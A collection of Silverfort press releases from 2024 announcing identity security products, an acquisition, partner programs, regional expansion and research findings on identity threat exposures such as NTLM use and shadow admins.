The newest product is the first to provide seamless discovery, classification, and enforcement of security controls for all privileged accounts, overcoming barriers that traditional Privileged Access Management (PAM) solutions do not offer

Gartner Identity & Access Management Summit, Grapevine, Texas & Boston, Mass. — December 9th, 2024 — Silverfort, the leading unified identity security company, today announced the launch of Privileged Access Security (PAS), a new way to secure privileged accounts faster and easier than ever before. Silverfort’s PAS product discovers, classifies, and protects privileged accounts end-to-end by operating from within the Identity and Access Management (IAM) infrastructure itself. This results in rapid time-to-value and far broader protection that will not leave any privileged account behind.
PAS can operate as a layer on top of any existing PAM solution, or as an alternative in places where PAM is too complex or expensive to implement. Unlike traditional PAM deployments that take months or even years, Silverfort’s PAS can be implemented and activated within days, allowing companies to effectively address security and compliance gaps while saving significant time and costs.

The identity security problem is rapidly escalating out of control: 8 out of 10 breaches leverage compromised identities and credentials, taking advantage of the countless silos and blind spots that the typical enterprise identity infrastructure suffers from. Privileged accounts—which have broad access permissions to sensitive information and can cause massive damage—are naturally the ones most targeted by attackers, yet many of them go unaccounted for and are not adequately secured. The rise of adversarial AI will only accelerate the rate of attacks, and their sophistication increases the threat to privileged accounts. Existing PAM solutions offer valuable security controls yet struggle to defend against today’s threats effectively because they require lengthy and complex deployments, rely on manual discovery and onboarding, and allow admins and attackers to bypass them easily. Only 10.2% of organizations are able to bring their PAM onboarding project to the finish line. As a result, organizations are searching for new solutions that will provide broader and stronger security while requiring less time and effort to implement and use.

“Securing privileged access has been one of the biggest challenges of the cybersecurity industry for decades, and solving it effectively in today’s hybrid and complex enterprise environments pushed us to innovate and break free from the old limitations,” said Hed Kovetz, CEO and Co-Founder of Silverfort.
“We heard from many organizations about the same gaps that make their current PAM solutions too slow to implement and too narrow to stop today’s threats and eventually found an innovative way to overcome these barriers. Our new PAS offering can operate on top of any existing PAM solution or as an alternative in places where PAM isn’t implemented. In both cases, it provides broader coverage, adds new security controls designed to stop modern threats, and dramatically reduces time-to-value from years to days.”

“Managing privileged accounts is table stakes. The problem, however, is that the current set of solutions tends to be extremely manual, take forever to implement, and can’t really help you find your unknowns,” said Rob Larsen, the former Chief Security Architect at GM & Silverfort Advisor. “With Silverfort’s unique technology, they’ve found an elegant, lightweight way for customers to discover unknown privileged accounts, tier them, and then secure them.”

Key capabilities of Silverfort’s Privileged Access Security offering:

- Automate privileged account discovery and classification: Automatically and continuously discover all privileged accounts based on their attributes and activity—including ones they didn’t know existed and no other solution could uncover. In addition, the new technology identifies privilege tiers and any misuse of privileged accounts outside of their permitted purpose, to help eliminate potential exposures.
- Enforce Least Privilege to prevent lateral movement and ransomware propagation: Take a Zero-Trust approach and prevent any misuse of privileged accounts, by automatically mapping where each account is being used and blocking access attempts that deviate from the account’s intended purpose.
- Implement frictionless Just-In-Time (JIT) access at scale: Apply Just-In-Time Access to any account with a single click, without requiring onboarding efforts and without changing how admins work.
PAS introduces a better, easier, and faster way to achieve Zero Standing Privileges at scale.

- Deploy and implement rapidly in days, not years: Silverfort's unique architecture enables incredibly fast time to value by enforcing security controls on top of the customer’s existing identity infrastructure. Rapidly address security gaps, compliance needs, and cyber insurance requirements, while saving implementation costs and often reducing insurance premiums.

One Platform to Protect All Identities, Including Privileged Accounts

Silverfort's technology offers a unique and significant advantage over all other identity security providers, with its ability to seamlessly enforce security controls on top of the customer's existing identity infrastructure, including Active Directory, Entra ID, Okta, Ping, and many other IAM solutions. This enables Silverfort to secure all enterprise assets, including ones that no other vendor can protect, such as legacy systems, command-line interfaces, and IT/OT infrastructure. Silverfort’s customers enjoy the benefits of having a single platform protecting their identities from compromise across all on-prem and cloud environments.

The launch of PAS comes on the heels of Silverfort’s acquisition of Rezonate, an innovator in Identity Security for cloud environments, and its $116M Series D funding in January 2024. The company continues to scale the business with over 100% year-over-year (YoY) growth, adding more than 100 new customers each quarter, including several Fortune 50 companies that trust Silverfort to protect their corporate identities.

Book a meeting with us at the Gartner IAM Summit in Grapevine, TX, December 9-11, or visit booth #441.

###

About Silverfort

Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere.
We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Partner of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www.silverfort.com or on LinkedIn.

About Gartner Identity & Access Management Summit

Gartner analysts will provide additional analysis on identity and access technologies and strategies at the Gartner Identity & Access Management Summit taking place December 9-11 in Grapevine. Follow news and updates from the conferences on X using #GartnerIAM.

---

- Published: 2024-11-13
- Modified: 2025-02-26
- URL: https://www.silverfort.com/press-news/silverfort-acquires-rezonate-to-deliver-the-first-complete-identity-security-platform/

With Rezonate’s acquisition, Silverfort continues to break down identity security silos across all enterprise environments, on-prem and in the cloud, for both human and non-human identities (NHIs), offering better and easier identity security from a single platform for its rapidly growing customer base

November 13, 2024 — Boston, MA — Today, Silverfort, the leading identity security company, announced the acquisition of Rezonate, an innovator in identity-first security for cloud environments.
Committed to providing the industry’s most complete identity security platform, the consolidated offering will strengthen and expand Silverfort's ability to protect identities across all on-prem assets, cloud identity providers, cloud infrastructure, and SaaS applications. The combined offering, fully integrated into Silverfort’s platform, will be available in mid-2025.

Consolidating Identity Security Silos and Eliminating Blind Spots

Today's organizations realize identity security isn't just an element of cybersecurity—it creates the most essential conditions required for success. Identity has become the primary attack vector, driving accelerated market demand for security solutions that put identity at the center. Yet, most identity solutions solve it only partially—they focus on either cloud or on-prem, or on a specific element of identity security; for example, Identity Threat Detection and Response (ITDR), Privileged Access Management (PAM) or Non-Human Identities (NHI). This approach creates security silos and blind spots, leading to ongoing exposure to identity-based attacks.

Integrating Rezonate's unique cloud-focused capabilities into Silverfort's Unified Identity Security Platform creates the broadest and most complete identity security offering on the market. Creating a shared security layer across all enterprise identities and collapsing the existing silos provides complete visibility and context for intelligent decision-making and more effective real-time security controls. Customers can now turn to Silverfort to solve every identity security need across any enterprise environment, yielding stronger security, easier deployments, and better operational efficiencies.

“After being neglected for years, identity security is becoming the most important element of cybersecurity. We couldn't be more excited to join Silverfort, as our mutual goal is to solve this difficult problem,” said Roy Akerman, CEO and Co-Founder of Rezonate.
"Silverfort built a powerful and innovative platform, an amazing team and culture, and is on a clear path to market leadership. We can't wait to join Silverfort and grow this platform to its full potential together."

### Rapid Growth for Unified Identity Security

Silverfort experienced rapid growth over the past several years, adding more than 100 new customers each quarter, including some of the largest enterprises in the world, and consistently growing its revenues by more than 100% year over year. After raising $116M in Series D funding earlier this year, the company is moving swiftly towards delivering its unified identity security platform vision.

"Both the technology built by the Rezonate team and the people themselves are extremely impressive,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Rezonate offers the broadest set of cloud identity security capabilities that we have seen from a startup of their size, covering NHI, ISPM, ITDR, entitlements and more across every cloud asset. Rezonate's innovative architecture also enables them to flex and scale to meet every customer's needs, with unmatched speed and simplicity—and customers love them for it. We're excited to join forces with Rezonate to empower every business to defend against the evolving identity threat landscape.”

### Stronger Together: One Platform to Protect All Enterprise Identities

Silverfort's technology offers a unique and significant advantage over all other identity security providers, with its ability to seamlessly enforce security controls on top of the customer's existing identity infrastructure, including Active Directory, Entra ID and many other IAM solutions. It secures vulnerable enterprise assets that no other vendor is able to protect, such as legacy systems, command-line interfaces, and IT/OT infrastructure.
With the addition of Rezonate's capabilities, Silverfort extends its reach deeper into cloud applications, workloads and infrastructure, with a broad set of capabilities, including Non-Human Identity (NHI) security, Identity Threat Detection and Response (ITDR), Identity Security Posture Management (ISPM), Entitlement Management and more—paving the way for a more secure future and giving organizations one platform to secure all their identities. Customers will enjoy the benefits of having a single platform to protect their identities from compromise across all their on-prem and cloud environments. Benefits include:

- Stronger protection with unified context: Stop identity threats on-prem, in the cloud, and anywhere in between with the most comprehensive view of all identities and access activity across an organization.
- One place for all identity security: Solve the entire identity security journey from a single platform, including discovery of hidden assets and exposures, prevention measures to reduce the attack surface, detection of identity threats, and real-time response that stops the threat before it can cause damage.
- Protecting every asset, including ‘unprotectable’ ones: Enable protection for any type of asset, both on-prem and in the cloud, including sensitive systems that cannot be protected by any other vendor, such as legacy systems, critical infrastructure, command-line interfaces and more.
- Rapidly deploy and scale: Achieve identity security across the entire organization within days to easily address compliance gaps and cyber insurance requirements, while saving significant time and cost.

Read more about why Silverfort acquired Rezonate in the blog by Silverfort’s CEO.

### About Silverfort

Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere.
We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft’s Zero Trust Partner of the Year. Hundreds of the world’s leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www.silverfort.com or on LinkedIn.

---

- Published: 2024-09-30
- Modified: 2025-02-26
- URL: https://www.silverfort.com/press-news/silverforts-identity-first-incident-response-solution-dramatically-cuts-investigation-recovery-times-from-weeks-down-to-days/

The new offering has already assisted several Fortune 500 companies in recent breaches; it complements existing incident response (IR) tools to help teams immediately contain attacks and reduce their blast radius.

Boston, Mass. — September 30, 2024 — Silverfort, the leading unified identity security company, announced its Identity-First Incident Response solution, accelerating attack remediation times by complementing existing incident response (IR) tools and optimizing IR processes. Silverfort has the only solution that flips the script on conventional IR playbooks, enabling IR teams to start their investigation by discovering and locking down compromised accounts first, then move on to identify infected machines and malicious network traffic. With this approach, security teams can save valuable time—in some cases, days and nights of non-stop work.

A traditional incident response process starts by searching for infected machines or monitoring network logs to spot anomalous traffic.
Pinpointing stolen identities—human users or non-human identities (NHI)—is usually the last piece in the puzzle, giving malicious actors the time and space to continue propagating inside a network during an investigation. In fact, identifying and containing breaches involving stolen credentials can take upwards of 292 days.

### Silverfort Turns the Traditional IR Process Upside Down

For the first time, IR teams can start an investigation by identifying and containing compromised accounts, effectively freezing malicious activity. Using a combination of machine learning (ML) and artificial intelligence (AI), IR practitioners have access to highly actionable telemetry providing the evidence of which accounts and users need to be blocked, and which accounts can remain operational while they run down the source of an incident.

“When responding to large incidents where lateral movement has taken place, it can be difficult to identify the impacted assets. Often, practitioners have to make difficult decisions with incomplete information when deploying containment actions, balancing attacker damage against business disruption. Having the ability to immediately challenge all authentication events while still allowing business operations to continue is like a surgeon having the ability to slow a patient’s heartbeat in order to perform surgery. You can effectively put an entire company ‘under,’ without stopping productivity, while you investigate the source of the issue,” said Eric Haller, Silverfort Advisor and former VP of Sec Ops & GRC at Palo Alto Networks. “With Silverfort, teams have a partner who gives them actionable telemetry about what needs to be contained so they can keep their businesses operational—and not kill productivity—while they investigate and figure out the best path towards recovery and remediation.
”

### Identity-First Approach Stops Threat Actors in their Tracks

Silverfort's Identity-First IR Solution brings identity to the forefront, freezing stolen accounts and stopping lateral movement to reduce the impact of an incident and accelerate remediation time. It can be rapidly deployed mid-breach (within less than 12 hours for an organization with 50,000 users, as demonstrated recently) to detect and contain compromised accounts and identify which systems, users, or other assets within the environment have been compromised. An identity-first approach to incident response relieves the burden of sifting through logs and network activity to identify compromised users and makes the overall IR process more efficient.

"Incident response is a race against the clock. In today's rapidly changing threat landscape, with sophisticated AI-backed threat actors, security teams can't afford to be hunting for an anomaly when potential attacks occur or systems go down," said Ron Rasin, Chief Strategy Officer at Silverfort. "While there's an established IR playbook to handle malware and network aspects of cyberattacks, the identity aspect is still a challenge. Silverfort's IR solution complements existing tools by instantly blocking compromised identities and adjacent machines and offering immediate visibility into those machines. We stanch the bleeding to ensure a safe recovery."

### Instantly Activate an “Authentication Firewall” for Domain Controllers and IAM Infrastructure

Silverfort integrates with an existing IR strategy in a crisis scenario and is the only identity security platform that can activate a firewall for the identity infrastructure, including Active Directory Domain Controllers. Once deployed, Silverfort identifies compromised user accounts and can activate its Authentication Firewall to block and contain the breach.
Essentially, the Authentication Firewall acts as a freeze button or "kill switch," analyzing every authentication and access attempt and denying requests to critical resources until IR teams have the upper hand. Silverfort will broadly deploy multi-factor authentication (MFA) to every identity and resource, and configure "block access" policies for suspected user accounts or groups. Once these policies are activated, any additional malicious authentication attempts will be blocked. Silverfort has proven this approach can reduce remediation times to days rather than weeks, and dramatically reduce the potential damage from a breach.

“Silverfort immediately helped in the mitigation of compromised users, and was key in tracking down compromised identities as we brought our Domain Controllers back online,” said an identity leader from a Fortune 100 financial services company that recently went through a breach. “We worked quickly with the IR team to immediately put blocking policies in place for the compromised identities.”

Key benefits of Silverfort's Identity-First Incident Response Solution include:

- Block a compromised user account in real time: Trigger MFA or block access instantly to stop an attack as it happens, providing security teams with actionable forensic data.
- Automatically flag risky users and computers: Investigate threats and gain visibility into what compromised users did. Easily cruise through different compromised computers and users in the environment to get a clear picture of what’s been compromised.
- Instantly deny access to any machine or resource: With Silverfort's Authentication Firewall, IR teams can automatically restrict access to limit an incident's blast radius.
- Highest-precision risk analysis and MFA verification: Analyze every login based on the user's full authentication trail and verify detected threats with MFA to reduce false positives and unburden security teams.
- Seamlessly integrate with existing Security Operations Infrastructure: Incorporate identity protection measures (e.g., MFA, service account protection, access block) into an existing SOAR automated playbook. Provide XDR with identity-related threat signals and suspected attacks. Ingest endpoint, network, and other telemetry to enrich context and refine the precision of detected threats. Exchange data with the SIEM for mutual correlation of risk signals, optimizing and enhancing insights into each user account's exposure to compromise or involvement in an active attack.
- Comprehensive coverage of the hybrid environment: Every authentication and access attempt—whether by a human or NHI—is monitored, on-prem or in the cloud.

Silverfort has spent years purposely designing its platform to eliminate the silos and blind spots that plague an organization's identity infrastructure, which no other solution has managed to address so far. The platform extends modern identity security measures to every enterprise resource, on-prem, in the cloud, human or NHI, providing a unified identity security layer that works effortlessly and instantly. By holistically enabling these modern identity security controls, even for previously unprotectable assets, customers can stop the most dangerous identity-based attacks, quickly comply with strict regulations, and meet their cyber insurance requirements.

Learn more about Silverfort's Unified Identity Security Platform and download our Identity Incident Response Playbook.

### About Silverfort

Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere. We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments.
Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www.silverfort.com or on LinkedIn.

---

- Published: 2024-07-23
- Modified: 2024-07-23
- URL: https://www.silverfort.com/press-news/silverfort-expands-operations-to-india-and-south-asia-bringing-a-universal-approach-to-identity-security-to-the-region/

An expansive partner network across the SAARC market ensures every business across the region will have access to a universal identity security platform that discovers and protects human and non-human identities across cloud and on-prem environments.

Bangalore, India – July 23, 2024 – Today, Silverfort, the leading identity company, announced that it is expanding its global operations to bring its Unified Identity Security Platform to India and neighboring South Asian countries. After seeing customer growth and success in the Australian and Singapore markets, Silverfort expanded its Global Partner Program to meet the growing need for a unified identity protection framework in the various Indian states and territories.

"Innovation and productivity are byproducts of the shift to the cloud, but so are complexity and increased identity risks. Identity teams need a solution that unifies identity security into a single solution that simultaneously encourages productivity and enhances security,” said Stuart Wilson, VP of Sales, APAC at Silverfort. “We’ve seen huge demand for Silverfort’s solutions across South Asia and India.
With boots on the ground, and by growing our partner network in this region, we’ll be able to meet customers where they are and help organizations build more resilient cybersecurity programs.”

Identity security is one of the most significant challenges security and IT leaders face today. Most enterprises use a combination of an on-prem identity management tool (i.e., Active Directory) and a mix of several cloud identity providers (IdPs) to manage and secure identities. But each tool operates in a silo, leaving gaps and blind spots that have resulted in a striking 83% of organizations reporting identity-related data breaches. A universal and unified approach to identity security is no longer a nice-to-have but a must-have for organizations looking for more resilient and scalable identity security programs. That’s why Silverfort moved to a 100% channel business and continuously partners with organizations that are hyper-focused on offering customers visibility and protection for all their identities, whether on-prem, in the cloud, human or non-human.

Identity is often a shared responsibility across multiple departments with different goals. Already overworked and understaffed, identity and security teams are stuck using a patchwork of tools to manage and secure identity across complex hybrid environments, many applications, and thousands of people. Silverfort's Unified Identity Security Platform protects every identity in an environment, including those that previously went unprotected. Designed not to interrupt a business's daily operations or disrupt day-to-day users, Silverfort extends protection to critical resources such as non-human identities, command-line tools, and OT infrastructure. Unlike other vendors, it's easy to deploy, proxyless, and can secure identities in the cloud or on-prem.
Silverfort breaks down identity barriers and silos, providing a unified identity security layer that helps organizations keep pace with today’s complex threat environment. Silverfort’s Unified Identity Security Platform:

- Discovers, protects and monitors service accounts (non-human identities) without modifying them
- Extends existing MFA solutions to ‘unprotectable’ systems (legacy applications, command-line interfaces, OT systems, file shares, etc.)
- Connects legacy applications into modern cloud IAM (including Azure AD Conditional Access)
- Detects and responds to identity-based attacks in real time, including account takeover, ransomware propagation, and lateral movement

To lead the go-to-market for India and the SAARC region, Silverfort has appointed Abhinav Gupta as the regional lead to drive local business, given his extensive experience in IT and cybersecurity. As an IIM alumnus with previous roles at global cybersecurity brands, Gupta will work closely with Indian enterprises to expand awareness about identity security and drive Silverfort's mission. To learn more about Silverfort and its products, visit www.silverfort.com.

### About Silverfort

Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere. We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft’s Zero Trust Champion of the Year.
Hundreds of the world’s leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www.silverfort.com or on LinkedIn.

---

- Published: 2024-06-12
- Modified: 2024-06-13
- URL: https://www.silverfort.com/press-news/silverfort-launches-the-identity-security-alliance/

Dozens of companies, including Microsoft, Okta, Ping Identity, Splunk, Wiz and others, partner to help customers overcome the challenges of securing today’s highly fragmented IAM landscape.

Boston, MA, and Tel Aviv, Israel – June 12, 2024 – Today, Silverfort is unveiling its Identity Security Alliance (ISA), to offer partners and customers a comprehensive, 360-degree view of the Identity and Access Management (IAM) landscape, user activity and security threats across all environments, ranging from legacy on-prem Active Directory (AD) to modern cloud-native identity infrastructure. By integrating with Silverfort, partners empower their customers to detect, investigate, and respond faster to identity-based attacks wherever they may occur.

Over recent years, the enterprise identity infrastructure has grown increasingly complex and fragmented. More than 90% of enterprises still use Active Directory (AD) to manage on-prem workforce identities, alongside a mix of one or more cloud identity providers (IdPs) and other point solutions like PAM, IGA, MFA and ITDR, amongst others. However, these point solutions operate in silos, leaving gaps and blind spots that have resulted in a striking 83% of organizations reporting identity-related data breaches. Adding to the complexity, organizations face challenges in extracting identity intelligence from AD and correlating that data with their cloud identity infrastructure and various security products. With AD often being the "keys to the castle," so to speak, it's a prime target for malicious actors who frequently use it as a point of entry to infiltrate the cloud infrastructure too.
Recent Silverfort research found that 67% of organizations sync their on-prem AD passwords to their cloud identity providers in an insecure manner, which increases their attack surface. As a result, many threat actors such as Alphv/BlackCat and Scattered Spider take advantage of AD as a stepping stone for spreading into the cloud identity infrastructure too.

“As the leader in Security Hyperautomation, we understand how critical it is for security and enterprise systems to work together,” said Eldad Livini, Chief Innovation Officer at Torq. “With the launch of Silverfort’s Identity Security Alliance, we are excited to participate in creating an ecosystem to secure one of the enterprise’s most important and targeted assets: their Identity Infrastructure.”

Silverfort's partner ecosystem removes identity silos, giving security and IT teams unified discovery and visibility into the hybrid identity infrastructure, from on-prem AD to cloud-native Identity Providers (IdPs), and all related security threats. Silverfort ISA partners can now extract identity intelligence from all the different corners of the identity infrastructure and feed it into other technology and security solutions in their stack, providing the missing pieces in the puzzle for a complete picture of the identity attack surface. Because the integrations are built on modern APIs, Silverfort partners can easily deploy and maintain them. Partners will also enjoy access to Silverfort's growing customer base and joint activities to benefit the identity security community.

"Collaboration and innovation are the driving forces behind cybersecurity, which is why Microsoft is incredibly excited about its continued collaboration with Silverfort and its Identity Security Alliance," said Maria Thomson, Director of Microsoft Intelligent Security Association. "Together, we have made significant progress in advancing identity protection and security, and we can't wait to see what more we can achieve together.
"

"Security is a team sport and requires deep technical partnerships with other vendors in a company's tech stack," said Ben Goodman, VP of Strategic Alliances and Corporate Development at Silverfort. "To successfully understand the risks your organization is up against, you have to extract data out of silos and correlate it to make it actionable. Identity information is a crux for hybrid cloud organizations today, and getting full visibility into the identity threat landscape is a huge need for our customers. Silverfort’s Identity Security Alliance will help close the gap and provide better visibility for our customers."

Joint Customer Benefits of Silverfort’s ISA include:

- Better interoperability between their different identity and security products, many of which previously operated as silos. This includes pre-built integrations that are regularly maintained, which lower implementation, support and operational costs.
- Deep unified visibility into the hybrid identity infrastructure, including identity threats hiding on-prem or in the cloud, with actionable reports and alerts.
- Extended real-time protection against identity threats across all identity silos, including AD and cloud infrastructure, for both human and non-human identities (NHI).
- Joint activities, content and research for the identity security community.

Together with our partners, and thanks to their combined strengths, customers can extend and consolidate their identity security, accelerate cloud migration, achieve compliance with regulations and cyber insurance requirements, and effectively prevent data breaches. Silverfort partners include organizations of all sizes, including Microsoft, Okta, Ping Identity, Palo Alto Networks, Splunk, Torq, Wiz, Axonius, SGNL, Red Access, Checkpoint, Entro Security, Apono, HYPR, Valence Security, Yubico, Veza, RSA, Infinipoint, StrongDM. Learn more about joining Silverfort's Identity Security Alliance here.
### About Silverfort

Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere. We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www.silverfort.com or on LinkedIn.

Contact: Silverfort@inkhouse.com

---

- Published: 2024-05-22
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-unveils-global-partner-program-to-meet-growing-demand-for-unified-identity-protection/

Channel industry veteran Leslie Bois leads the company toward its 100% channel-focused business strategy.

Tel Aviv, Israel & Boston – May 22, 2024 — Silverfort, the leading identity protection company, announced its comprehensive Unified Partner Program to enable its global channel and cyber insurance partners to create the ultimate identity protection framework. This news comes on the heels of Silverfort’s recent $116M Series D funding, led by Brighton Park Capital. The new funds will help Silverfort expand its platform with new innovative product modules and accelerate its go-to-market strategy with an emphasis on channel partnerships.
Identity has become the weakest link in enterprise security, and solving it requires a new, holistic approach—a unified, end-to-end layer of security that covers all the silos and blind spots of the identity infrastructure. With 80% of organizations having experienced an identity-related breach and compromised credentials being the #1 tactic used by threat actors and ransomware campaigns, Silverfort equips enterprises with a way to easily visualize, detect, prevent, and respond to identity-based attacks.

“Identity is becoming the last line of defense in cybersecurity—and is currently the most exposed attack surface,” said Silverfort’s Vice President of Global Channels, Leslie Bois. “Defending against today’s threats requires a holistic security approach that covers the entire identity infrastructure, both on-prem and in the cloud, with a unified platform. We believe the best way to help organizations achieve that is with our mutual partners. That’s why Silverfort is moving fast towards a 100% channel business and seeing amazing momentum as a result.”

“Partnering with Silverfort has enabled Alchemy to extend identity and access protection beyond the traditional limitations,” said JJ Savarino, vice president of marketing and vendor management at Alchemy Technology Group. “Together, we can now offer identity security to all sensitive resources. Because Alchemy takes an identity-centric approach to cybersecurity, Silverfort has become critical to the comprehensive security strategies we build for clients.”

Silverfort spent years researching and designing its platform to enable modern identity security controls everywhere and eliminate the silos and blind spots that identity security suffers from. Since bringing Bois on board in early 2023 to lead global channel sales, Silverfort has become a 100% channel-first organization.
Silverfort, with the help of its partners, is hyper-focused on offering customers visibility and protection for all their identities, whether they are on-prem, in the cloud, human, or machine—including systems that no other solution can protect. Given Silverfort’s customer-first mindset, partnering with organizations with deep expertise in identity was the ideal strategy. Since the decision to make the company’s business 100% channel-based, revenues have been growing rapidly—more than 100% year-over-year—with more than 90% of the revenues going through its channel program, and in some regions, 100%.

Key benefits of Silverfort’s Partner Program include:

- Seamless integration with other products in the partner’s portfolio: While traditional MFA and IAM solutions fail to deliver the 360-degree protection organizations need in their complex hybrid environments, Silverfort can extend the coverage of any other identity product to all resources, including ones that couldn’t be protected before, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, and many more. This allows partners to show far greater value to their customers by combining Silverfort with other products to deliver a comprehensive offering.
- Access to comprehensive training: This year, partners can benefit from training, accreditations, and knowledge support to increase their technical, deployment, and service expertise. The easy-to-use Silverfort Academy portal empowers Silverfort’s partners to deepen their knowledge of Silverfort’s products and identity security in general and enables them to offer additional services and better manage and support their customers.
- Compliance support: Enable customers to comply with Cyber Insurance requirements and various regulatory frameworks, such as the UK’s Civil Aviation Authority Requirements and the NY-DFS and PCI-DSS regulations.
Silverfort’s solution also supports President Biden’s 2021 Executive Order on Cybersecurity, which requires risk-based authentication and Zero Trust security.

“With the uptick of identity-based attacks, cybersecurity leaders are asking us for identity security solutions,” said Jeremy Pierson, cybersecurity program architect at CompuNet. “Thanks to our partnership with Silverfort, CompuNet has been able to help secure our customers’ identity infrastructure effectively and expediently.”

Silverfort offers three different levels in its partner program that give partners additional benefits and support to help accelerate their business and grow together. Those benefits include significant discounts, enablement, joint marketing, and more. Similarly, Silverfort offers support and incentives to cyber insurance partners based on their business model: reselling Silverfort’s product, getting referral incentives (for the partner or the end customer), or simply recommending Silverfort’s solution.

Silverfort is dedicated to protecting all identities from a single unified platform, eliminating the need for point identity security solutions that operate as silos. Eighty-two percent of businesses have hybrid environments consisting of both on-prem and cloud-based identity infrastructure, which results in identity sprawl and ineffective security. Silverfort breaks down identity barriers and silos, providing a unified identity security layer that works holistically across both cloud and on-prem environments. Learn more about Silverfort’s Unified Partner Program here.

### About Silverfort

Silverfort, the Unified Identity Protection company, pioneered the first and only platform that enables modern identity security everywhere. We deliver a unified layer of security across all the silos of enterprise identity infrastructure, both on-prem and cloud.
Our unique architecture and vendor-agnostic approach take away the complexity of securing identities across the various systems and environments, and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, and many more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www.silverfort.com or on LinkedIn.

---

- Published: 2024-03-26
- Modified: 2024-09-10
- URL: https://www.silverfort.com/press-news/silverfort-research-finds-two-thirds-of-businesses-sync-on-prem-passwords-to-cloud-environments/

Company Unveils its Proprietary Identity Underground Report 2024; First Identity Report 100% Dedicated to Exposing Frequency & Prevalence of Identity Threat Exposures (ITEs)

Alphv BlackCat and Lockbit ransomware threat actors abuse gaps in identity to steal credentials, escalate privileges, and move through organizations undetected

Tel Aviv, Israel & Boston, MA, March 26, 2024 – Today, Silverfort, the Unified Identity Protection Company, unveiled its Identity Underground Report, highlighting the frequency of identity security gaps that lead to successful attacks on organizations across every industry and region. Fueled by Silverfort's proprietary data, the report is the first of its kind, focusing on identity as an attack vector and offering insights into the Identity Threat Exposures (ITEs) that pave the way for cyberattacks. The data, analysis, and insights help identity and security teams benchmark their security programs, empowering them to make informed decisions on where to invest in identity security.
The standout – and alarming – finding is that two out of every three businesses (67%) routinely synchronize most of their users’ passwords from their on-premises directories to their cloud counterparts. This practice inadvertently migrates on-prem identity weaknesses to the cloud, which poses substantial security risks by creating a gateway for attackers to hack these environments from on-prem settings. The Alphv BlackCat ransomware group is known to use Active Directory as a stepping stone to compromise cloud identity providers.

Over the past decade, there has been a rush to migrate to the cloud – and for a good reason. Simultaneously, however, security gaps stemming from legacy infrastructure, misconfigurations, and insecure built-in features create pathways for attackers to access the cloud, significantly weakening a company's resilience to identity threats.

"Identity is the elephant in the room. We know that identity plays a key role in nearly every cyberattack. Lockbit, BlackCat, TA577, Fancy Bear – they all use identity gaps to break in, move laterally, and gain more permissions," said Hed Kovetz, CEO and Co-founder of Silverfort. "But we need to know how common each identity security gap is so we can start methodically fixing them. Finally, we have concrete evidence outlining the frequency of identity gaps, which we can now classify as Password Exposers, Lateral Movers, or Privilege Escalators, and they’re all vehicles for threat actors to complete their attacks. We hope that by shining a light on the prevalence of these issues, identity and security teams will have the hard numbers they need to prioritize adequate security investments and eliminate these blind spots.”

Key findings include:

- Two-thirds of all user accounts authenticate via the weakly encrypted NTLM protocol, providing attackers easy access to cleartext passwords.
Easily cracked with brute-force attacks, NT LAN Manager (NTLM) authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research from Proofpoint security shows threat actor TA577 using NTLM authentication information to steal passwords.
- A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. Attackers use shadow admins to change settings and permissions and gain more access to machines as they move deeper into an environment.
- 7% of user accounts inadvertently hold admin-level access privileges, giving attackers more opportunities to escalate privileges and move throughout environments undetected.
- 31% of user accounts are service accounts. Service accounts are used for machine-to-machine communication and have a high level of access and privileges. Attackers target service accounts as security teams often overlook them. Only 20% of companies are highly confident that they have visibility into every service account and can protect them.
